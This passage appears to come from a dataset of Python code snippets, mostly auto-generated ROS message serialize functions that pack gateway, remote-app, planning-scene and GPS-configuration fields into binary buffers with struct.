type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v5 = val1.platform_info\n _x = _v5.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v5.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v5.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v6 = _v5.icon\n _x = _v6.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v6.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v6.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v5.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v7 = val1.conn_stats\n _x = _v7\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v8 = val2.icon\n _x = _v8.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v8.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v8.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.missing)\n buff.write(_struct_I.pack(length))\n for val1 in self.missing:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v9 = val1.platform_info\n _x = _v9.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v9.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v9.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v10 = _v9.icon\n _x = _v10.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v10.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v10.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v9.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v11 = val1.conn_stats\n _x = _v11\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v12 = val2.icon\n _x = _v12.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v12.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v12.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.gone)\n buff.write(_struct_I.pack(length))\n for val1 in self.gone:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v13 = val1.platform_info\n _x = _v13.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v13.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v13.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v14 = _v13.icon\n _x = _v14.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v14.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v14.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v13.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v15 = val1.conn_stats\n _x = _v15\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v16 = val2.icon\n _x = _v16.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v16.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v16.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self) -> bytes:\n pass", "def serialize(self) -> bytes:\n pass", "def serialize(msg) -> str:\n try:\n return json.dumps(msg, separators=(',', ':'))\n except json.JSONDecodeError as err:\n return err.msg", "def serialize(self, buff):\n try:\n buff.write(_get_struct_645f().pack(*self.Rscanpose))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n length = len(self.cnt)\n buff.write(_struct_I.pack(length))\n for val1 in self.cnt:\n _v1 = val1.header\n buff.write(_get_struct_I().pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.devadd))\n _v3 = val1.now\n _x = _v3\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n buff.write(_get_struct_I().pack(val1.encounter))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def to_bytes(self):\n\t\treturn self.buffer.tobytes();", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_H2BiIbB4H2B3I().pack(_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.position))\n length = len(self.planning_scene.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.velocity))\n length = len(self.planning_scene.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.effort))\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:\n _v113 = val1.position\n _x = _v113\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v114 = val1.orientation\n _x = _v114\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.fixed_frame_transforms:\n _v115 = val1.header\n buff.write(_struct_I.pack(_v115.seq))\n _v116 = _v115.stamp\n _x = _v116\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v115.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v117 = val1.transform\n _v118 = _v117.translation\n _x = _v118\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v119 = _v117.rotation\n _x = _v119\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(struct.pack(pattern, *val1.enabled))\n length = len(self.planning_scene.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v120 = val1.shape\n buff.write(_struct_b.pack(_v120.type))\n length = len(_v120.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *_v120.dimensions))\n length = len(_v120.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *_v120.triangles))\n length = len(_v120.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v120.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v121 = val1.pose_stamped\n _v122 = _v121.header\n buff.write(_struct_I.pack(_v122.seq))\n _v123 = _v122.stamp\n _x = _v123\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v122.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v124 = _v121.pose\n _v125 = _v124.position\n _x = _v125\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v126 = _v124.orientation\n _x = _v126\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_objects:\n _v127 = val1.header\n buff.write(_struct_I.pack(_v127.seq))\n _v128 = _v127.stamp\n _x = _v128\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v127.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v129 = val1.operation\n buff.write(_struct_b.pack(_v129.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val2.dimensions))\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val2.triangles))\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v130 = val2.position\n _x = _v130\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v131 = val2.orientation\n _x = _v131\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v132 = val1.object\n _v133 = _v132.header\n buff.write(_struct_I.pack(_v133.seq))\n _v134 = _v133.stamp\n _x = _v134\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v133.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v132.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v132.padding))\n _v135 = _v132.operation\n buff.write(_struct_b.pack(_v135.operation))\n length = len(_v132.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v132.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *val3.dimensions))\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *val3.triangles))\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v132.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v132.poses:\n _v136 = val3.position\n _x = _v136\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v137 = val3.orientation\n _x = _v137\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))\n _x = self.planning_scene.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene.collision_map.boxes:\n _v138 = val1.center\n _x = _v138\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v139 = val1.extents\n _x = _v139\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v140 = val1.axis\n _x = _v140\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_b7d().pack(_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, 